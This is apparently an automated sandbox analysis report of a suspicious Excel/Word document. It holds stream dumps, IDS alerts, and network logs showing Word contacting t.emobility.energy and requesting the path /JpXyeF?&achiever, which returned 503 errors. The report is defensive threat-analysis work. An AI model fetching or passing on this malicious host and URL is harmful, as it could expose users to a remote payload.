                            Data ASCII:. . . . l . . . . . . . . . . . . . . . . . . . . . . . . . J [ . . ( W . . E M F . . . . | . . k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ K . . h C . . F . . . , . . . . . . E M F + . @ . . . . . . . . . . . . . . . . X . . . X . . . F . . . \\ . . . P . . . E M F + " @ . . . . . . . . . . . @ . . . . . . . . . . $ @ . . . . . . . . . . 0 @ . . . . . . . . . . . . ? ! @ . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:01 00 00 00 6c 00 00 00 00 00 00 00 20 00 00 00 0a 14 00 00 f1 13 00 00 00 00 00 00 00 00 00 00 4a 5b 00 00 28 57 00 00 20 45 4d 46 00 00 01 00 7c 90 00 00 6b 04 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ec 13 00 00 c8 19 00 00 d8 00 00 00 17 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 4b 03 00 68 43 04 00 46 00 00 00 2c 00 00 00 20 00 00 00 45 4d 46 2b 01 40 01 00
                            General
                            Stream Path:\x3ObjInfo
                            CLSID:
                            File Type:data
                            Stream Size:6
                            Entropy:1.2516291673878228
                            Base64 Encoded:False
                            Data ASCII:. . . . . .
                            Data Raw:00 00 03 00 0d 00
                            General
                            Stream Path:\x5DocumentSummaryInformation
                            CLSID:
                            File Type:data
                            Stream Size:560
                            Entropy:3.3879366798911743
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , D . . . . . . . . . . + , . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . % . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 00 00 00 05 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 8c 01 00 00 48 01 00 00 10 00 00 00 01 00 00 00 88 00 00 00 03 00 00 00 90 00 00 00 05 00 00 00 9c 00 00 00 06 00 00 00 a4 00 00 00 07 00 00 00 ac 00 00 00 08 00 00 00 b4 00 00 00 09 00 00 00
                            General
                            Stream Path:\x5SummaryInformation
                            CLSID:
                            File Type:data
                            Stream Size:24184
                            Entropy:3.1945226555165376
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . H ^ . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . 1 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . . g . @ . . . . . . Q < . . @ . . .
                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 48 5e 00 00 0e 00 00 00 01 00 00 00 78 00 00 00 04 00 00 00 80 00 00 00 07 00 00 00 94 00 00 00 08 00 00 00 a0 00 00 00 09 00 00 00 b0 00 00 00 12 00 00 00 bc 00 00 00 0b 00 00 00 d4 00 00 00 0c 00 00 00 e0 00 00 00 0d 00 00 00 ec 00 00 00
                            General
                            Stream Path:Workbook
                            CLSID:
                            File Type:Applesoft BASIC program data, first line number 16
                            Stream Size:17006
                            Entropy:4.28640454300865
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . Z T 0 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . .
                            Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c9 80 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                            Download Network PCAP: filteredfull

                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                            2025-03-25T12:47:44.471240+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549717162.19.137.157443TCP
                            2025-03-25T12:47:45.563705+01001810005Joe Security ANOMALY Microsoft Office WebDAV Discovery1192.168.2.549718162.19.137.157443TCP
                            2025-03-25T12:47:46.006761+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549719162.19.137.157443TCP
                            • Total Packets: 38
                            • 443 (HTTPS)
                            • 53 (DNS)
                            TimestampSource PortDest PortSource IPDest IP
                            Mar 25, 2025 12:47:44.094798088 CET49717443192.168.2.5162.19.137.157
                            Mar 25, 2025 12:47:44.094850063 CET44349717162.19.137.157192.168.2.5
                            Mar 25, 2025 12:47:44.094995975 CET49717443192.168.2.5162.19.137.157
                            Mar 25, 2025 12:47:44.095429897 CET49717443192.168.2.5162.19.137.157
                            Mar 25, 2025 12:47:44.095446110 CET44349717162.19.137.157192.168.2.5
                            Mar 25, 2025 12:47:44.471149921 CET44349717162.19.137.157192.168.2.5
                            Mar 25, 2025 12:47:44.471240044 CET49717443192.168.2.5162.19.137.157
                            Mar 25, 2025 12:47:44.472852945 CET49717443192.168.2.5162.19.137.157
                            Mar 25, 2025 12:47:44.472863913 CET44349717162.19.137.157192.168.2.5
                            Mar 25, 2025 12:47:44.473126888 CET44349717162.19.137.157192.168.2.5
                            Mar 25, 2025 12:47:44.474476099 CET49717443192.168.2.5162.19.137.157
                            Mar 25, 2025 12:47:44.520265102 CET44349717162.19.137.157192.168.2.5
                            Mar 25, 2025 12:47:44.828069925 CET44349717162.19.137.157192.168.2.5
                            Mar 25, 2025 12:47:44.828140974 CET44349717162.19.137.157192.168.2.5
                            Mar 25, 2025 12:47:44.828212023 CET49717443192.168.2.5162.19.137.157
                            Mar 25, 2025 12:47:44.831005096 CET49717443192.168.2.5162.19.137.157
                            Mar 25, 2025 12:47:44.831036091 CET44349717162.19.137.157192.168.2.5
                            Mar 25, 2025 12:47:44.844630957 CET49718443192.168.2.5162.19.137.157
                            Mar 25, 2025 12:47:44.844665051 CET44349718162.19.137.157192.168.2.5
                            Mar 25, 2025 12:47:44.844788074 CET49718443192.168.2.5162.19.137.157
                            Mar 25, 2025 12:47:44.845410109 CET49718443192.168.2.5162.19.137.157
                            Mar 25, 2025 12:47:44.845422029 CET44349718162.19.137.157192.168.2.5
                            Mar 25, 2025 12:47:45.206003904 CET44349718162.19.137.157192.168.2.5
                            Mar 25, 2025 12:47:45.206094027 CET49718443192.168.2.5162.19.137.157
                            Mar 25, 2025 12:47:45.216145992 CET49718443192.168.2.5162.19.137.157
                            Mar 25, 2025 12:47:45.216159105 CET44349718162.19.137.157192.168.2.5
                            Mar 25, 2025 12:47:45.216433048 CET44349718162.19.137.157192.168.2.5
                            Mar 25, 2025 12:47:45.216497898 CET49718443192.168.2.5162.19.137.157
                            Mar 25, 2025 12:47:45.217155933 CET49718443192.168.2.5162.19.137.157
                            Mar 25, 2025 12:47:45.264265060 CET44349718162.19.137.157192.168.2.5
                            Mar 25, 2025 12:47:45.563728094 CET44349718162.19.137.157192.168.2.5
                            Mar 25, 2025 12:47:45.563801050 CET44349718162.19.137.157192.168.2.5
                            Mar 25, 2025 12:47:45.563904047 CET49718443192.168.2.5162.19.137.157
                            Mar 25, 2025 12:47:45.620016098 CET49718443192.168.2.5162.19.137.157
                            Mar 25, 2025 12:47:45.620045900 CET44349718162.19.137.157192.168.2.5
                            Mar 25, 2025 12:47:45.620057106 CET49718443192.168.2.5162.19.137.157
                            Mar 25, 2025 12:47:45.620117903 CET49718443192.168.2.5162.19.137.157
                            Mar 25, 2025 12:47:45.636439085 CET49719443192.168.2.5162.19.137.157
                            Mar 25, 2025 12:47:45.636488914 CET44349719162.19.137.157192.168.2.5
                            Mar 25, 2025 12:47:45.636801004 CET49719443192.168.2.5162.19.137.157
                            Mar 25, 2025 12:47:45.637150049 CET49719443192.168.2.5162.19.137.157
                            Mar 25, 2025 12:47:45.637167931 CET44349719162.19.137.157192.168.2.5
                            Mar 25, 2025 12:47:46.004686117 CET44349719162.19.137.157192.168.2.5
                            Mar 25, 2025 12:47:46.006761074 CET49719443192.168.2.5162.19.137.157
                            Mar 25, 2025 12:47:46.006762028 CET49719443192.168.2.5162.19.137.157
                            Mar 25, 2025 12:47:46.006788015 CET44349719162.19.137.157192.168.2.5
                            Mar 25, 2025 12:47:46.006798983 CET44349719162.19.137.157192.168.2.5
                            Mar 25, 2025 12:47:46.366946936 CET44349719162.19.137.157192.168.2.5
                            Mar 25, 2025 12:47:46.367031097 CET44349719162.19.137.157192.168.2.5
                            Mar 25, 2025 12:47:46.367167950 CET49719443192.168.2.5162.19.137.157
                            Mar 25, 2025 12:47:46.367223024 CET44349719162.19.137.157192.168.2.5
                            Mar 25, 2025 12:47:46.367240906 CET49719443192.168.2.5162.19.137.157
                            Mar 25, 2025 12:47:46.367240906 CET49719443192.168.2.5162.19.137.157
                            Mar 25, 2025 12:47:46.367254972 CET44349719162.19.137.157192.168.2.5
                            Mar 25, 2025 12:47:46.367261887 CET44349719162.19.137.157192.168.2.5
                            Mar 25, 2025 12:47:46.447187901 CET49721443192.168.2.5162.19.137.157
                            Mar 25, 2025 12:47:46.447252035 CET44349721162.19.137.157192.168.2.5
                            Mar 25, 2025 12:47:46.447451115 CET49721443192.168.2.5162.19.137.157
                            Mar 25, 2025 12:47:46.447942019 CET49721443192.168.2.5162.19.137.157
                            Mar 25, 2025 12:47:46.447961092 CET44349721162.19.137.157192.168.2.5
                            Mar 25, 2025 12:47:46.810271025 CET44349721162.19.137.157192.168.2.5
                            Mar 25, 2025 12:47:46.810866117 CET49721443192.168.2.5162.19.137.157
                            Mar 25, 2025 12:47:46.811521053 CET49721443192.168.2.5162.19.137.157
                            Mar 25, 2025 12:47:46.811532974 CET44349721162.19.137.157192.168.2.5
                            Mar 25, 2025 12:47:46.813329935 CET49721443192.168.2.5162.19.137.157
                            Mar 25, 2025 12:47:46.813335896 CET44349721162.19.137.157192.168.2.5
                            Mar 25, 2025 12:47:47.164581060 CET44349721162.19.137.157192.168.2.5
                            Mar 25, 2025 12:47:47.164670944 CET44349721162.19.137.157192.168.2.5
                            Mar 25, 2025 12:47:47.164766073 CET49721443192.168.2.5162.19.137.157
                            Mar 25, 2025 12:47:47.165946007 CET49721443192.168.2.5162.19.137.157
                            Mar 25, 2025 12:47:47.165987968 CET44349721162.19.137.157192.168.2.5
                            Mar 25, 2025 12:47:47.166008949 CET49721443192.168.2.5162.19.137.157
                            Mar 25, 2025 12:47:47.166053057 CET49721443192.168.2.5162.19.137.157
                            TimestampSource PortDest PortSource IPDest IP
                            Mar 25, 2025 12:47:43.927630901 CET4981753192.168.2.51.1.1.1
                            Mar 25, 2025 12:47:44.093766928 CET53498171.1.1.1192.168.2.5
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Mar 25, 2025 12:47:43.927630901 CET192.168.2.51.1.1.10xf4e1Standard query (0)t.emobility.energyA (IP address)IN (0x0001)false
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Mar 25, 2025 12:47:41.612327099 CET1.1.1.1192.168.2.50xa097No error (0)ecs-office.s-0005.dual-s-msedge.nets-0005.dual-s-msedge.netCNAME (Canonical name)IN (0x0001)false
                            Mar 25, 2025 12:47:41.612327099 CET1.1.1.1192.168.2.50xa097No error (0)s-0005.dual-s-msedge.net52.123.128.14A (IP address)IN (0x0001)false
                            Mar 25, 2025 12:47:41.612327099 CET1.1.1.1192.168.2.50xa097No error (0)s-0005.dual-s-msedge.net52.123.129.14A (IP address)IN (0x0001)false
                            Mar 25, 2025 12:47:44.093766928 CET1.1.1.1192.168.2.50xf4e1No error (0)t.emobility.energyhost1.emobility.energyCNAME (Canonical name)IN (0x0001)false
                            Mar 25, 2025 12:47:44.093766928 CET1.1.1.1192.168.2.50xf4e1No error (0)host1.emobility.energy162.19.137.157A (IP address)IN (0x0001)false
                            • t.emobility.energy
                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.549717162.19.137.1574438076C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            TimestampBytes transferredDirectionData
                            2025-03-25 11:47:44 UTC331OUTOPTIONS / HTTP/1.1
                            Connection: Keep-Alive
                            Authorization: Bearer
                            User-Agent: Microsoft Office Word 2014
                            X-Office-Major-Version: 16
                            X-MS-CookieUri-Requested: t
                            X-FeatureVersion: 1
                            Accept-Auth: badger,Wlid1.1,Bearer,Basic,NTLM,Digest,Kerberos,Negotiate,Nego2
                            X-MSGETWEBURL: t
                            X-IDCRL_ACCEPTED: t
                            Host: t.emobility.energy
                            2025-03-25 11:47:44 UTC190INHTTP/1.1 503 Service Unavailable
                            Date: Tue, 25 Mar 2025 11:47:44 GMT
                            Server: Apache/2.4.62 (Debian)
                            Content-Length: 384
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            2025-03-25 11:47:44 UTC384INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 62 6c 65 20 74 6f 20 73 65 72 76 69 63 65 20 79 6f 75 72 0a 72 65 71 75 65 73 74 20 64 75 65 20 74 6f 20 6d 61 69 6e 74 65 6e 61 6e 63 65 20 64 6f 77 6e 74 69 6d 65 20 6f 72 20 63 61 70 61 63 69 74 79 0a 70 72 6f 62 6c 65 6d 73 2e
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>503 Service Unavailable</title></head><body><h1>Service Unavailable</h1><p>The server is temporarily unable to service yourrequest due to maintenance downtime or capacityproblems.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.549718162.19.137.1574438076C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            TimestampBytes transferredDirectionData
                            2025-03-25 11:47:45 UTC234OUTOPTIONS / HTTP/1.1
                            Authorization: Bearer
                            X-MS-CookieUri-Requested: t
                            X-FeatureVersion: 1
                            X-IDCRL_ACCEPTED: t
                            User-Agent: Microsoft Office Protocol Discovery
                            Host: t.emobility.energy
                            Content-Length: 0
                            Connection: Keep-Alive
                            2025-03-25 11:47:45 UTC190INHTTP/1.1 503 Service Unavailable
                            Date: Tue, 25 Mar 2025 11:47:45 GMT
                            Server: Apache/2.4.62 (Debian)
                            Content-Length: 384
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            2025-03-25 11:47:45 UTC384INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 62 6c 65 20 74 6f 20 73 65 72 76 69 63 65 20 79 6f 75 72 0a 72 65 71 75 65 73 74 20 64 75 65 20 74 6f 20 6d 61 69 6e 74 65 6e 61 6e 63 65 20 64 6f 77 6e 74 69 6d 65 20 6f 72 20 63 61 70 61 63 69 74 79 0a 70 72 6f 62 6c 65 6d 73 2e
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>503 Service Unavailable</title></head><body><h1>Service Unavailable</h1><p>The server is temporarily unable to service yourrequest due to maintenance downtime or capacityproblems.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2192.168.2.549719162.19.137.1574438076C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            TimestampBytes transferredDirectionData
                            2025-03-25 11:47:46 UTC326OUTHEAD /JpXyeF?&achiever HTTP/1.1
                            Connection: Keep-Alive
                            Authorization: Bearer
                            User-Agent: Microsoft Office Word 2014
                            X-Office-Major-Version: 16
                            X-MS-CookieUri-Requested: t
                            X-FeatureVersion: 1
                            Accept-Auth: badger,Wlid1.1,Bearer,Basic,NTLM,Digest,Kerberos,Negotiate,Nego2
                            X-IDCRL_ACCEPTED: t
                            Host: t.emobility.energy
                            2025-03-25 11:47:46 UTC169INHTTP/1.1 503 Service Unavailable
                            Date: Tue, 25 Mar 2025 11:47:46 GMT
                            Server: Apache/2.4.62 (Debian)
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            3192.168.2.549721162.19.137.1574438076C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            TimestampBytes transferredDirectionData
                            2025-03-25 11:47:46 UTC191OUTGET /JpXyeF?&achiever HTTP/1.1
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)
                            Accept-Encoding: gzip, deflate
                            Host: t.emobility.energy
                            Connection: Keep-Alive
                            2025-03-25 11:47:47 UTC190INHTTP/1.1 503 Service Unavailable
                            Date: Tue, 25 Mar 2025 11:47:47 GMT
                            Server: Apache/2.4.62 (Debian)
                            Content-Length: 384
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            2025-03-25 11:47:47 UTC384INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 62 6c 65 20 74 6f 20 73 65 72 76 69 63 65 20 79 6f 75 72 0a 72 65 71 75 65 73 74 20 64 75 65 20 74 6f 20 6d 61 69 6e 74 65 6e 61 6e 63 65 20 64 6f 77 6e 74 69 6d 65 20 6f 72 20 63 61 70 61 63 69 74 79 0a 70 72 6f 62 6c 65 6d 73 2e
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>503 Service Unavailable</title></head><body><h1>Service Unavailable</h1><p>The server is temporarily unable to service yourrequest due to maintenance downtime or capacityproblems.


                            050100s020406080100

                            Click to jump to process

                            050100s0.0050100150MB

                            Click to jump to process

                            • File
                            • Registry

                            Click to dive into process behavior distribution

                            Target ID:0
                            Start time:07:47:36
                            Start date:25/03/2025
                            Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
                            Imagebase:0x20000
                            File size:1'620'872 bytes
                            MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                            No disassembly